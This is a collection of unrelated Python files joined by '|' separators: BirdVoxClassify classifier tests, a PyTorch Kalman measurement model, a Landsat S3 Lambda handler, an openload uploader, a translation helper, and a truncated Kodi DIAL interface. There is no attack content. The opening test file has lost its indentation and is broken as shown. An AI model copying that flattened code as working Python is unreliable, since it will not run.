assert settings['pcen_norm_exponent'] > 0
assert 'pcen_power' in settings
assert isinstance(settings['pcen_power'], float)
assert settings['pcen_power'] > 0
assert 'top_freq_id' in settings
assert isinstance(settings['top_freq_id'], int)
assert settings['top_freq_id'] > 0
assert 'win_length' in settings
assert isinstance(settings['win_length'], int)
assert settings['win_length'] > 0
assert 'n_hops' in settings
assert isinstance(settings['n_hops'], int)
assert settings['n_hops'] > 0
assert 'window' in settings
assert isinstance(settings['window'], str)
# Make sure window is valid
get_window(settings['window'], 5)
def test_get_model_path():
test_model_name = "test_model_name"
exp_model_path = os.path.join(RES_DIR, "models", test_model_name + '.h5')
model_path = get_model_path(test_model_name)
assert os.path.abspath(model_path) == os.path.abspath(exp_model_path)
# Test Python 3.8 handling
test_model_name = "birdvoxclassify_test_model_name"
if sys.version_info.major == 3 and sys.version_info.minor == 8:
exp_test_model_name = "birdvoxclassify-py3pt8_test_model_name"
else:
exp_test_model_name = "birdvoxclassify_test_model_name"
exp_model_path = os.path.join(RES_DIR, "models", exp_test_model_name + '.h5')
model_path = get_model_path(test_model_name)
assert os.path.abspath(model_path) == os.path.abspath(exp_model_path)
# Test deprecated taxonomy checksums
test_model_name = "test_model_name-2e7e1bbd434a35b3961e315cfe3832fc"
pytest.deprecated_call(get_model_path, test_model_name)
test_model_name = "test_model_name-beb9234f0e13a34c7ac41db72e85addd"
pytest.deprecated_call(get_model_path, test_model_name)
def test_load_classifier():
classifier = load_classifier(MODEL_NAME)
# Test invalid inputs
invalid_path = get_model_path("invalid-classifier")
with open(invalid_path, "w") as f:
f.write("INVALID")
try:
pytest.raises(BirdVoxClassifyError, load_classifier, "invalid-classifier")
finally:
os.remove(invalid_path)
pytest.raises(BirdVoxClassifyError, load_classifier, "/invalid/path")
def test_get_taxonomy_path():
# Make sure that the correct taxonomy path is returned
taxonomy_version = "v1234"
test_content = 'hello world!'
hash_md5 = hashlib.md5()
hash_md5.update(test_content.encode())
exp_md5sum = hash_md5.hexdigest()
exp_taxonomy_path = os.path.join(TAX_DIR, taxonomy_version + ".json")
with open(exp_taxonomy_path, 'w') as f:
f.write(test_content)
model_name = "test-model-name_{}-{}".format(taxonomy_version, exp_md5sum)
try:
taxonomy_path = get_taxonomy_path(model_name)
assert os.path.abspath(taxonomy_path) == os.path.abspath(exp_taxonomy_path)
# Make sure that an error is raised when md5sum doesn't match
hash_md5 = hashlib.md5()
hash_md5.update("different".encode())
diff_md5sum = hash_md5.hexdigest()
model_name = "test-model-name_{}-{}".format(taxonomy_version, diff_md5sum)
pytest.raises(BirdVoxClassifyError, get_taxonomy_path,
model_name)
finally:
os.remove(exp_taxonomy_path)
# Test deprecated taxonomy checksums
test_model_name = "test-model-name_tv1hierarchical-2e7e1bbd434a35b3961e315cfe3832fc"
pytest.deprecated_call(get_taxonomy_path, test_model_name)
test_model_name = "test-model-name_tv1fine-beb9234f0e13a34c7ac41db72e85addd"
pytest.deprecated_call(get_taxonomy_path, test_model_name)
def test_validate_batch_pred_list():
n_examples = 5
taxonomy = load_taxonomy(TAXV1_HIERARCHICAL_PATH)
# Test valid batch
batch_pred_list = []
for level, encoding_list in taxonomy["output_encoding"].items():
n_classes = len(encoding_list)
batch_pred = np.random.random((n_examples, n_classes))
batch_pred_list.append(batch_pred)
_validate_batch_pred_list(batch_pred_list)
# Test invalid batch
batch_pred_list = []
for idx, (level, encoding_list) in enumerate(taxonomy["output_encoding"].items()):
n_classes = len(encoding_list)
if idx == 0:
batch_pred = np.random.random((10, n_classes))
else:
batch_pred = np.random.random((n_examples, n_classes))
batch_pred_list.append(batch_pred)
pytest.raises(BirdVoxClassifyError, _validate_batch_pred_list, batch_pred_list)
def test_validate_prediction():
taxonomy = load_taxonomy(TAXV1_HIERARCHICAL_PATH)
# Test valid prediction
pred_list = []
for level, encoding_list in taxonomy["output_encoding"].items():
n_classes = len(encoding_list)
pred = np.random.random((n_classes,))
pred_list.append(pred)
formatted_pred_dict = format_pred(pred_list, taxonomy)
_validate_prediction(pred_list, taxonomy)
_validate_prediction([pred[np.newaxis, :] for pred in pred_list], taxonomy)
_validate_prediction(formatted_pred_dict, taxonomy)
# Test invalid batches
pytest.raises(BirdVoxClassifyError, _validate_prediction,
pred_list * 2, taxonomy)
pred_list = []
for level, encoding_list in taxonomy["output_encoding"].items():
n_classes = len(encoding_list)
# Ensure number of classes is different than expected
pred = np.random.random((n_classes + 5,))
pred_list.append(pred)
pytest.raises(BirdVoxClassifyError, _validate_prediction,
pred_list, taxonomy)
# Make sure a real prediction makes it through the pipeline with no problem
output = process_file(CHIRP_PATH, model_name=MODEL_NAME)
formatted_pred_dict = [x for x in output.values()][0]
_validate_prediction(formatted_pred_dict, taxonomy)
def test_get_batch_best_candidates():
taxonomy = load_taxonomy(TAXV1_HIERARCHICAL_PATH)
# Non-HC and HC Cand: "1"
coarse_pred = np.array([0.9])
# Non-HC and HC Cand: "1.4"
medium_pred = np.array([0.1, 0.0, 0.0, 0.8, 0.2])
# Non-HC Cand: "1.1.1", HC Cand: "1.4.3"
fine_pred = np.array([0.7, 0.0, 0.0, 0.0, 0.0,
0.0, 0.0, 0.0, 0.0, 0.6,
0.0, 0.0, 0.0, 0.0, 0.3])
pred_list = [coarse_pred, medium_pred, fine_pred]
formatted_pred_dict = format_pred(pred_list, taxonomy)
exp_output = {}
exp_output['coarse'] = {'probability': coarse_pred[0]}
exp_output['coarse'].update(get_taxonomy_node("1", taxonomy))
exp_output['medium'] = {'probability': medium_pred[3]}
exp_output['medium'].update(get_taxonomy_node("1.4", taxonomy))
exp_output['fine'] = {'probability': fine_pred[0]}
exp_output['fine'].update(get_taxonomy_node("1.1.1", taxonomy))
batch_pred_list = [np.tile(pred, (10, 1)) for pred in pred_list]
batch_formatted_pred_list = [formatted_pred_dict] * 10
exp_output_batch = [exp_output] * 10
batch_best_cand_list = get_batch_best_candidates(
batch_formatted_pred_list=batch_formatted_pred_list,
hierarchical_consistency=False)
batch_best_cand_list_2 = get_batch_best_candidates(
batch_pred_list=batch_pred_list,
hierarchical_consistency=False,
taxonomy=taxonomy
)
# Make sure output is as expected
for idx, best_cand_dict in enumerate(batch_best_cand_list):
exp_output = exp_output_batch[idx]
assert set(exp_output.keys()) == set(best_cand_dict.keys())
for level in exp_output.keys():
assert best_cand_dict[level]["common_name"] \
== exp_output[level]["common_name"]
assert best_cand_dict[level]["scientific_name"] \
== exp_output[level]["scientific_name"]
assert best_cand_dict[level]["taxonomy_level_names"] \
== exp_output[level]["taxonomy_level_names"]
assert best_cand_dict[level]["taxonomy_level_aliases"] \
== exp_output[level]["taxonomy_level_aliases"]
assert best_cand_dict[level]["child_ids"] \
== exp_output[level]["child_ids"]
assert np.isclose(best_cand_dict[level]["probability"],
exp_output[level]["probability"])
if 'id' in exp_output[level]:
assert best_cand_dict[level]["id"] == exp_output[level]["id"]
# Make sure unformatted and formatted batches both produce the same result
assert len(batch_best_cand_list) == len(batch_best_cand_list_2)
for idx, best_cand_dict in enumerate(batch_best_cand_list):
best_cand_dict_2 = batch_best_cand_list_2[idx]
assert set(best_cand_dict_2.keys()) == set(best_cand_dict.keys())
for level in best_cand_dict_2.keys():
assert best_cand_dict[level]["common_name"] \
== best_cand_dict_2[level]["common_name"]
assert best_cand_dict[level]["scientific_name"] \
== best_cand_dict_2[level]["scientific_name"]
assert best_cand_dict[level]["taxonomy_level_names"] \
== best_cand_dict_2[level]["taxonomy_level_names"]
assert best_cand_dict[level]["taxonomy_level_aliases"] \
== best_cand_dict_2[level]["taxonomy_level_aliases"]
assert best_cand_dict[level]["child_ids"] \
== best_cand_dict_2[level]["child_ids"]
assert np.isclose(best_cand_dict[level]["probability"],
best_cand_dict_2[level]["probability"])
if 'id' in best_cand_dict[level]:
assert best_cand_dict[level]["id"] == best_cand_dict_2[level]["id"]
# Check invalid inputs
pytest.raises(BirdVoxClassifyError, get_batch_best_candidates,
batch_pred_list=batch_pred_list,
batch_formatted_pred_list=batch_formatted_pred_list)
pytest.raises(BirdVoxClassifyError, get_batch_best_candidates,
batch_formatted_pred_list=batch_formatted_pred_list)
def test_get_best_candidates():
taxonomy = load_taxonomy(TAXV1_HIERARCHICAL_PATH)
# Non-HC and HC Cand: "1"
coarse_pred = np.array([0.9])
# Non-HC and HC Cand: "1.4"
medium_pred = np.array([0.1, 0.0, 0.0, 0.8, 0.2])
# Non-HC Cand: "1.1.1", HC Cand: "1.4.3"
fine_pred = np.array([0.7, 0.0, 0.0, 0.0, 0.0,
0.0, 0.0, 0.0, 0.0, 0.6,
0.0, 0.0, 0.0, 0.0, 0.3])
pred_list = [coarse_pred, medium_pred, fine_pred]
formatted_pred_dict = format_pred(pred_list, taxonomy)
out1 = get_best_candidates(formatted_pred_dict=formatted_pred_dict,
hierarchical_consistency=False)
exp_output = {}
exp_output['coarse'] = {'probability': coarse_pred[0]}
exp_output['coarse'].update(get_taxonomy_node("1", taxonomy))
exp_output['medium'] = {'probability': medium_pred[3]}
exp_output['medium'].update(get_taxonomy_node("1.4", taxonomy))
exp_output['fine'] = {'probability': fine_pred[0]}
exp_output['fine'].update(get_taxonomy_node("1.1.1", taxonomy))
# Make sure output is in expected format
assert set(out1.keys()) == set(taxonomy["output_encoding"].keys())
for level, cand_dict in out1.items():
assert isinstance(cand_dict, dict)
assert out1[level]["common_name"] == exp_output[level]["common_name"]
assert out1[level]["scientific_name"] \
== exp_output[level]["scientific_name"]
assert out1[level]["taxonomy_level_names"] \
== exp_output[level]["taxonomy_level_names"]
assert out1[level]["taxonomy_level_aliases"] \
== exp_output[level]["taxonomy_level_aliases"]
assert out1[level]["child_ids"] \
== exp_output[level]["child_ids"]
assert np.isclose(out1[level]["probability"],
exp_output[level]["probability"])
if 'id' in exp_output[level]:
assert out1[level]["id"] == exp_output[level]["id"]
# Make sure passing in pred_list or formatted_pred_dict results in the same
# output
out2 = get_best_candidates(pred_list=pred_list,
taxonomy=taxonomy,
hierarchical_consistency=False)
for level in out1.keys():
assert set(out1[level].keys()) == set(out2[level].keys())
for k in out1[level].keys():
assert out1[level][k] == out2[level][k]
# Make sure hierarchical consistency is correctly applied
out3 = get_best_candidates(formatted_pred_dict=formatted_pred_dict,
taxonomy=taxonomy)
exp_output = {}
exp_output['coarse'] = {'probability': coarse_pred[0]}
exp_output['coarse'].update(get_taxonomy_node("1", taxonomy))
exp_output['medium'] = {'probability': medium_pred[3]}
exp_output['medium'].update(get_taxonomy_node("1.4", taxonomy))
exp_output['fine'] = {'probability': fine_pred[9]}
exp_output['fine'].update(get_taxonomy_node("1.4.3", taxonomy))
# Make sure output is in expected format
    assert set(out3.keys()) == set(taxonomy["output_encoding"].keys())
    for level, cand_dict in out3.items():
assert isinstance(cand_dict, dict)
assert out3[level]["common_name"] == exp_output[level]["common_name"]
assert out3['fine']["scientific_name"] \
== exp_output['fine']["scientific_name"]
assert out3['fine']["taxonomy_level_names"] \
== exp_output['fine']["taxonomy_level_names"]
assert out3['fine']["taxonomy_level_aliases"] \
== exp_output['fine']["taxonomy_level_aliases"]
assert out3['fine']["child_ids"] \
== exp_output['fine']["child_ids"]
assert np.isclose(out3['fine']["probability"],
exp_output['fine']["probability"])
if 'id' in exp_output[level]:
assert out3[level]["id"] == exp_output[level]["id"]
# Test invalid inputs
pytest.raises(BirdVoxClassifyError, get_best_candidates,
pred_list=pred_list, formatted_pred_dict=formatted_pred_dict)
pytest.raises(BirdVoxClassifyError, get_best_candidates,
formatted_pred_dict=formatted_pred_dict, taxonomy=None)
pytest.raises(BirdVoxClassifyError, get_best_candidates,
pred_list=pred_list, taxonomy=None)
pytest.raises(BirdVoxClassifyError, get_best_candidates,
hierarchical_consistency=False,
pred_list=pred_list, taxonomy=None)
# Make sure a real prediction makes it through the pipeline with no problem
output = process_file(CHIRP_PATH, model_name=MODEL_NAME)
formatted_pred_dict = [x for x in output.values()][0]
out1 = get_best_candidates(formatted_pred_dict=formatted_pred_dict,
hierarchical_consistency=False)
out2 = get_best_candidates(formatted_pred_dict=formatted_pred_dict,
taxonomy=taxonomy)
def test_validate_taxonomy():
taxonomy = load_taxonomy(TAXV1_HIERARCHICAL_PATH)
_validate_taxonomy(taxonomy)
with open(TAXV1_HIERARCHICAL_PATH, 'r') as f:
taxonomy2 = json.load(f)
pytest.raises(ValueError, _validate_taxonomy, taxonomy2)
def test_apply_hierarchical_consistency():
taxonomy = load_taxonomy(TAXV1_HIERARCHICAL_PATH)
# HC Cand: "1"
coarse_pred = np.array([0.9])
# HC Cand: "1.4"
medium_pred = np.array([0.1, 0.0, 0.0, 0.8, 0.2])
# HC Cand: "1.4.3" (different class than without HC)
fine_pred = np.array([0.7, 0.0, 0.0, 0.0, 0.0,
0.0, 0.0, 0.0, 0.0, 0.6,
0.0, 0.0, 0.0, 0.0, 0.3])
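    # With hierarchical consistency the fine-level candidate is restricted to the
    # children of the selected medium node ("1.4"), so index 9 ("1.4.3", prob 0.6)
    # is chosen instead of the global argmax at index 0 ("1.1.1", prob 0.7).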
pred_list = [coarse_pred, medium_pred, fine_pred]
formatted_pred_dict = format_pred(pred_list, taxonomy)
out1 = apply_hierarchical_consistency(formatted_pred_dict, taxonomy)
exp_output = {}
exp_output['coarse'] = {'probability': coarse_pred[0]}
exp_output['coarse'].update(get_taxonomy_node("1", taxonomy))
exp_output['medium'] = {'probability': medium_pred[3]}
exp_output['medium'].update(get_taxonomy_node("1.4", taxonomy))
exp_output['fine'] = {'probability': fine_pred[9]}
exp_output['fine'].update(get_taxonomy_node("1.4.3", taxonomy))
# Make sure output is in expected format
assert set(out1.keys()) == set(taxonomy["output_encoding"].keys())
for level, cand_dict in out1.items():
assert isinstance(cand_dict, dict)
assert out1[level]["common_name"] == exp_output[level]["common_name"]
assert out1['fine']["scientific_name"] \
== exp_output['fine']["scientific_name"]
assert out1['fine']["taxonomy_level_names"] \
== exp_output['fine']["taxonomy_level_names"]
assert out1['fine']["taxonomy_level_aliases"] \
== exp_output['fine']["taxonomy_level_aliases"]
assert out1['fine']["child_ids"] \
== exp_output['fine']["child_ids"]
assert np.isclose(out1['fine']["probability"],
exp_output['fine']["probability"])
if 'id' in exp_output[level]:
assert out1[level]["id"] == exp_output[level]["id"]
# HC Cand: "1"
coarse_pred = np.array([0.9])
# HC Cand: "1.4"
medium_pred = np.array([0.1, 0.0, 0.0, 0.8, 0.2])
# HC Cand: "other" (wouldn't be other w/o HC)
fine_pred = np.array([0.7, 0.0, 0.0, 0.0, 0.0,
0.0, 0.0, 0.0, 0.0, 0.3,
0.0, 0.0, 0.0, 0.0, 0.3])
pred_list = [coarse_pred, medium_pred, fine_pred]
formatted_pred_dict = format_pred(pred_list, taxonomy)
out2 = apply_hierarchical_consistency(formatted_pred_dict, taxonomy)
exp_output = {}
exp_output['coarse'] = {'probability': coarse_pred[0]}
exp_output['coarse'].update(get_taxonomy_node("1", taxonomy))
exp_output['medium'] = {'probability': medium_pred[3]}
exp_output['medium'].update(get_taxonomy_node("1.4", taxonomy))
exp_output["fine"] = {
"probability": 1 - fine_pred[9],
"common_name": "other",
"scientific_name": "other",
"taxonomy_level_names": "fine",
"taxonomy_level_aliases": {},
'child_ids': taxonomy["output_encoding"]["fine"][-1]["ids"]
}
# Make sure output is in expected format
assert set(out2.keys()) == set(taxonomy["output_encoding"].keys())
for level, cand_dict in out2.items():
assert isinstance(cand_dict, dict)
assert out2[level]["common_name"] == exp_output[level]["common_name"]
assert out2[level]["scientific_name"] \
== exp_output[level]["scientific_name"]
assert out2[level]["taxonomy_level_names"] \
== exp_output[level]["taxonomy_level_names"]
assert out2[level]["taxonomy_level_aliases"] \
== exp_output[level]["taxonomy_level_aliases"]
assert out2[level]["child_ids"] \
== exp_output[level]["child_ids"]
assert np.isclose(out2[level]["probability"],
exp_output[level]["probability"])
if 'id' in exp_output[level]:
assert out2[level]["id"] == exp_output[level]["id"]
# HC Cand: "other"
coarse_pred = np.array([0.1])
# HC Cand: "other" (wouldn't be other if not for previous level being other)
medium_pred = np.array([0.1, 0.0, 0.0, 0.8, 0.2])
# HC Cand: "other" (wouldn't be other if not for previous level being other)
fine_pred = np.array([0.7, 0.0, 0.0, 0.0, 0.0,
0.0, 0.0, 0.0, 0.0, 0.6,
0.0, 0.0, 0.0, 0.0, 0.3])
pred_list = [coarse_pred, medium_pred, fine_pred]
formatted_pred_dict = format_pred(pred_list, taxonomy)
out3 = apply_hierarchical_consistency(formatted_pred_dict, taxonomy)
exp_output = {
"coarse": {
"probability": 1 - coarse_pred[0],
"common_name": "other",
"scientific_name": "other",
"taxonomy_level_names": "coarse",
"taxonomy_level_aliases": {},
'child_ids': taxonomy["output_encoding"]["coarse"][-1]["ids"]
},
"medium": {
"probability": 1 - coarse_pred[0],
"common_name": "other",
"scientific_name": "other",
"taxonomy_level_names": "medium",
"taxonomy_level_aliases": {},
'child_ids': taxonomy["output_encoding"]["medium"][-1]["ids"]
},
"fine": {
"probability": 1 - coarse_pred[0],
"common_name": "other",
"scientific_name": "other",
"taxonomy_level_names": "fine",
"taxonomy_level_aliases": {},
'child_ids': taxonomy["output_encoding"]["fine"][-1]["ids"]
}
}
# Make sure output is in expected format
assert set(out3.keys()) == set(taxonomy["output_encoding"].keys())
for level, cand_dict in out3.items():
assert isinstance(cand_dict, dict)
assert out3[level]["common_name"] == exp_output[level]["common_name"]
assert out3[level]["scientific_name"] \
== exp_output[level]["scientific_name"]
assert out3[level]["taxonomy_level_names"] \
== exp_output[level]["taxonomy_level_names"]
assert out3[level]["taxonomy_level_aliases"] \
== exp_output[level]["taxonomy_level_aliases"]
assert out3[level]["child_ids"] \
== exp_output[level]["child_ids"]
assert np.isclose(out3[level]["probability"],
exp_output[level]["probability"])
if 'id' in exp_output[level]:
assert out3[level]["id"] == exp_output[level]["id"]
# HC Cand: "1"
coarse_pred = np.array([0.9])
# HC Cand: "other"
medium_pred = np.array([0.1, 0.0, 0.0, 0.2, 0.8])
# HC Cand: "other" (wouldn't be other if not for previous level being other)
fine_pred = np.array([0.7, 0.0, 0.0, 0.0, 0.0,
0.0, 0.0, 0.0, 0.0, 0.6,
0.0, 0.0, 0.0, 0.0, 0.3])
pred_list = [coarse_pred, medium_pred, fine_pred]
formatted_pred_dict = format_pred(pred_list, taxonomy)
out4 = apply_hierarchical_consistency(formatted_pred_dict, taxonomy)
exp_output = {}
exp_output['coarse'] = {'probability': coarse_pred[0]}
exp_output['coarse'].update(get_taxonomy_node("1", taxonomy))
exp_output['medium'] = {
"probability": 1 - medium_pred[3],
"common_name": "other",
"scientific_name": "other",
"taxonomy_level_names": "medium",
"taxonomy_level_aliases": {},
'child_ids': taxonomy["output_encoding"]["medium"][-1]["ids"]
}
exp_output['fine'] = {
"probability": 1 - medium_pred[3],
"common_name": "other",
"scientific_name": "other",
"taxonomy_level_names": "fine",
"taxonomy_level_aliases": {},
'child_ids': taxonomy["output_encoding"]["fine"][-1]["ids"]
}
# Make sure output is in expected format
assert set(out4.keys()) == set(taxonomy["output_encoding"].keys())
for level, cand_dict in out4.items():
assert isinstance(cand_dict, dict)
assert out4[level]["common_name"] == exp_output[level]["common_name"]
assert out4[level]["scientific_name"] \
== exp_output[level]["scientific_name"]
assert out4[level]["taxonomy_level_names"] \
== exp_output[level]["taxonomy_level_names"]
assert out4[level]["taxonomy_level_aliases"] \
== exp_output[level]["taxonomy_level_aliases"]
assert out4[level]["child_ids"] \
== exp_output[level]["child_ids"]
assert np.isclose(out4[level]["probability"],
exp_output[level]["probability"])
if 'id' in exp_output[level]:
assert out4[level]["id"] == exp_output[level]["id"]
# Test with custom level_threshold_dict
level_threshold_dict = {
"coarse": 0.99,
"medium": 0.99,
"fine": 0.99
}
# HC Cand: "other" (due to threshold)
coarse_pred = np.array([0.9])
# HC Cand: "other"
medium_pred = np.array([0.1, 0.0, 0.0, 0.8, 0.2])
# HC Cand: "other"
fine_pred = np.array([0.7, 0.0, 0.0, 0.0, 0.0,
0.0, 0.0, 0.0, 0.0, 0.6,
0.0, 0.0, 0.0, 0.0, 0.3])
pred_list = [coarse_pred, medium_pred, fine_pred]
formatted_pred_dict = format_pred(pred_list, taxonomy)
out5 = apply_hierarchical_consistency(formatted_pred_dict, taxonomy,
level_threshold_dict=level_threshold_dict)
exp_output = {}
exp_output['coarse'] = {
"probability": 1 - coarse_pred[0],
"common_name": "other",
"scientific_name": "other",
"taxonomy_level_names": "coarse",
"taxonomy_level_aliases": {},
'child_ids': taxonomy["output_encoding"]["coarse"][-1]["ids"]
}
exp_output['medium'] = {
"probability": 1 - coarse_pred[0],
"common_name": "other",
"scientific_name": "other",
"taxonomy_level_names": "medium",
"taxonomy_level_aliases": {},
'child_ids': taxonomy["output_encoding"]["medium"][-1]["ids"]
}
exp_output['fine'] = {
"probability": 1 - coarse_pred[0],
"common_name": "other",
"scientific_name": "other",
"taxonomy_level_names": "fine",
"taxonomy_level_aliases": {},
'child_ids': taxonomy["output_encoding"]["fine"][-1]["ids"]
}
# Make sure output is in expected format
assert set(out5.keys()) == set(taxonomy["output_encoding"].keys())
for level, cand_dict in out5.items():
assert isinstance(cand_dict, dict)
assert out5[level]["common_name"] == exp_output[level]["common_name"]
assert out5[level]["scientific_name"] \
== exp_output[level]["scientific_name"]
assert out5[level]["taxonomy_level_names"] \
== exp_output[level]["taxonomy_level_names"]
assert out5[level]["taxonomy_level_aliases"] \
== exp_output[level]["taxonomy_level_aliases"]
assert out5[level]["child_ids"] \
== exp_output[level]["child_ids"]
assert np.isclose(out5[level]["probability"],
exp_output[level]["probability"])
if 'id' in exp_output[level]:
assert out5[level]["id"] == exp_output[level]["id"]
# Check invalid inputs
pytest.raises(BirdVoxClassifyError, apply_hierarchical_consistency,
formatted_pred_dict, taxonomy, detection_threshold=-1)
# Check invalid inputs
pytest.raises(BirdVoxClassifyError, apply_hierarchical_consistency,
formatted_pred_dict, taxonomy, level_threshold_dict={
'coarse': -1,
'medium': -1,
'fine': -1
})
pytest.raises(BirdVoxClassifyError, apply_hierarchical_consistency,
formatted_pred_dict, taxonomy, level_threshold_dict={
'garply': 0.1
})
|
"""Private module; avoid importing from directly.
"""
import abc
from typing import Tuple
import torch
import torch.nn as nn
from overrides import overrides
from .. import types
class KalmanFilterMeasurementModel(abc.ABC, nn.Module):
def __init__(self, *, state_dim, observation_dim):
super().__init__()
self.state_dim = state_dim
"""int: State dimensionality."""
self.observation_dim = observation_dim
"""int: Observation dimensionality."""
@abc.abstractmethod
# @overrides
def forward(
self, *, states: types.StatesTorch
) -> Tuple[types.ObservationsNoDictTorch, types.ScaleTrilTorch]:
"""Observation model forward pass, over batch size `N`.
Args:
states (torch.Tensor): States to pass to our observation model.
Shape should be `(N, state_dim)`.
Returns:
            Tuple[torch.Tensor, torch.Tensor]: tuple containing expected observations
            and the Cholesky decomposition of the observation covariance. Shapes
            should be `(N, observation_dim)` and `(N, observation_dim, observation_dim)`.
"""
def jacobian(self, *, states: types.StatesTorch) -> torch.Tensor:
"""Returns Jacobian of the measurement model.
Args:
states (torch.Tensor): Current state, size `(N, state_dim)`.
Returns:
torch.Tensor: Jacobian, size `(N, observation_dim, state_dim)`
"""
observation_dim = self.observation_dim
with torch.enable_grad():
x = states.detach().clone()
N, ndim = x.shape
assert ndim == self.state_dim
x = x[:, None, :].expand((N, observation_dim, ndim))
x.requires_grad_(True)
y = self(states=x.reshape((-1, ndim)))[0].reshape((N, -1, observation_dim))
mask = torch.eye(observation_dim, device=x.device).repeat(N, 1, 1)
jac = torch.autograd.grad(y, x, mask, create_graph=True)
return jac[0]
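# A minimal sketch (not part of the original module) of a concrete subclass,
# assuming types.StatesTorch is a plain torch.Tensor: it observes the first
# `observation_dim` state components with fixed unit-variance noise, which is
# enough to exercise forward() and the autodiff-based jacobian() above.
class _LinearMeasurementModel(KalmanFilterMeasurementModel):
    def __init__(self, *, state_dim: int, observation_dim: int):
        super().__init__(state_dim=state_dim, observation_dim=observation_dim)
        # Fixed (non-trainable) observation matrix C, shape (observation_dim, state_dim)
        self.register_buffer("C", torch.eye(observation_dim, state_dim))

    def forward(
        self, *, states: types.StatesTorch
    ) -> Tuple[types.ObservationsNoDictTorch, types.ScaleTrilTorch]:
        N = states.shape[0]
        expected_observations = states @ self.C.transpose(0, 1)  # (N, observation_dim)
        scale_tril = torch.eye(
            self.observation_dim, device=states.device
        ).expand(N, -1, -1)  # (N, observation_dim, observation_dim)
        return expected_observations, scale_tril

# Usage sketch:
#   model = _LinearMeasurementModel(state_dim=4, observation_dim=2)
#   jac = model.jacobian(states=torch.randn(5, 4))  # -> shape (5, 2, 4)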
|
# AWS Lambda function that returns the list of Landsat scene IDs for an input path/row
import json
import boto3
event = {
"queryStringParameters": {
"path": "143",
"row": "37"
}
}
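# The original module does not define bad_request(); this is a minimal sketch
# assuming an API Gateway-style 400 response.
def bad_request():
    responseObject = {}
    responseObject['statusCode'] = 400
    responseObject['headers'] = {'Content-Type': 'application/json'}
    responseObject['body'] = json.dumps({'Message': 'Invalid path/row'})
    return responseObject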
def landsat_handler(event, context=None):  # Lambda handlers receive (event, context); context is unused here
# parse event
path = event['queryStringParameters']['path']
row = event['queryStringParameters']['row']
path = path.zfill(3)
row = row.zfill(3)
if int(path) > 233 or int(row) > 233:
return bad_request()
# search landsat s3 bucket
s3 = boto3.client('s3', region_name='us-west-2')
params = {
'Bucket': 'landsat-pds',
'Prefix': f'c1/L8/{path}/{row}/',
'Delimiter': '/'
}
dirs = []
s3Response = s3.list_objects_v2(**params)
prefixes = s3Response['CommonPrefixes']
for prefix in prefixes:
raw_dir = list(prefix.values())
dirs.append(raw_dir[0])
# construct body of response object
landsatResponse = {}
landsatResponse['Dirs'] = dirs
landsatResponse['Message'] = 'Hello from lambda land'
# construct http response object
responseObject = {}
responseObject['statusCode'] = 200
responseObject['headers'] = {}
responseObject['headers']['Content-Type'] = 'application/json'
responseObject['body'] = json.dumps(landsatResponse)
# return
return responseObject
if __name__ == '__main__':
    # Local smoke test using the sample event defined above
    responseObject = landsat_handler(event)
    print(responseObject)
|
import requests
import json
HOSTER_NAME = "openload"
HOSTER_HAS_DIRECT_LINKS = False
HOSTER_KEEP_UNAVAILABLE_UPLOADS = False
OPENLOAD_CO_UPLOAD_URL = "https://api.openload.co/1/file/ul"
def linkFromId(id):
return "https://openload.co/embed/" + id
def upload(filename):
print("[openload] Requesting upload slot...")
result = requests.get(OPENLOAD_CO_UPLOAD_URL)
uploadSlot = json.loads(result.text)
if uploadSlot["status"] != 200:
print("Requesting upload failed.")
return ""
print("[openload] Starting upload...")
    # Use a context manager so the uploaded file handle is closed afterwards
    with open(filename, "rb") as upload_file:
        result = requests.post(
            uploadSlot["result"]["url"],
            files={"file1": upload_file}
        )
    return json.loads(result.text)["result"]["id"]
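# Usage sketch (hypothetical file name):
#   file_id = upload("video.mp4")
#   if file_id:
#       print(linkFromId(file_id))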
|
from googletrans import Translator
from BingTTS import TTS
# Translate the given text into the requested language and speak it via TTS
def translate(input, language_to):
    translator = Translator()
    if language_to in lan:
        #say = '你好嗎'
        result = translator.translate(input, dest=lan.get(language_to))
        #result = translator.translate(say, dest=lan.get('日文'))
        #result = translator.translate('我想吃晚餐', dest=lan.get('日文'))
        #speak(result.text, lan.get(l))
        TTS(result.text, language_to)
        #print(result.text)
        return result.text
    else:
        # Unsupported language: say "I don't understand" in Chinese
        TTS('我不懂', '中文')
# Supported target languages (display name -> googletrans language code)
lan = {
'英文':'en',
'中文':'zh-TW',
'日文':'ja',
'德文':'de',
'法文':'fr',
'韓文':'ko',
'泰文':'th'
}
#translate(None)
#translate('你好嗎','日文')
#translate(speech('請選擇要翻譯的語言',2,3), speech('正在翻譯...',2,2))
|
# -*- coding: utf-8 -*-
"""
Copyright (C) 2021 Stefano Gottardo (script.appcast)
An interface to provide a communication between Kodi and a DIAL app
SPDX-License-Identifier: MIT
See LICENSES/MIT.md for more information.
"""
import json
import threading
from copy import deepcopy
import xbmc
import resources.lib.helpers.kodi_ops as kodi_ops
from resources.lib.globals import G
from resources.lib.helpers.logging import LOG
class KodiInterface:
"""
    Provides callbacks for Kodi events and methods for obtaining data from Kodi (see the 'kodi' variable in app.py)
"""
def __init__(self, apps):
self._apps = apps
self._mutex = threading.Lock()
        # TODO: make event callbacks switchable when the active app is changed to another app
self._active_app = None
self.player = Player(self)
self.monitor = Monitor(self)
@property
def active_app(self):
return self._active_app
@active_app.setter
def active_app(self, value):
self.player._active_app = value
self._active_app = value
def play_url(self, app, **kwargs):
"""
Play a video
:param app: Specify the DialApp class (use 'self')
        :param kwargs: kwargs used to format the ADDON_PLAY_PATH string (optional)
        """
        # Before calling the add-on to play the video, we must inform our player
        # interface that the video is being started by a DIAL app
        # TODO: make event callbacks switchable when the active app is changed to another app
if self.active_app is None or (self.active_app and not isinstance(self.active_app, app.__class__)):
self.active_app = app
self.player.notify_video_started()
self.player.play(app.ADDON_PLAY_PATH.format(**kwargs))
def notify_play(self, app):
"""Notify the interface that will be played a new audio/video content"""
if self.active_app is None or (self.active_app and not isinstance(self.active_app, app.__class__)):
self.active_app = app
self.player.notify_video_started()
def _notify_apps(self, callback_name, data=None):
if self._active_app is None:
LOG.warn('Ignored Kodi callback {}, no app currently active', callback_name)
return False
self._mutex.acquire()
LOG.debug('Notify Kodi callback {} to {} with data: {}', callback_name, self._active_app.DIAL_APP_NAME, data)
ret = self._execute_notify(self._active_app, callback_name, data)
self._mutex.release()
return ret
def _notify_all_apps(self, callback_name, data=None, extra_data_app=None):
for _app in self._apps:
_data = deepcopy(data)
            # Add the extra data only when it targets the currently active app
            if extra_data_app is not None and extra_data_app[0] == self._active_app:
                _data.update(extra_data_app[1])
LOG.debug('Notify Kodi callback {} to {} with data: {}', callback_name, _app.DIAL_APP_NAME, _data)
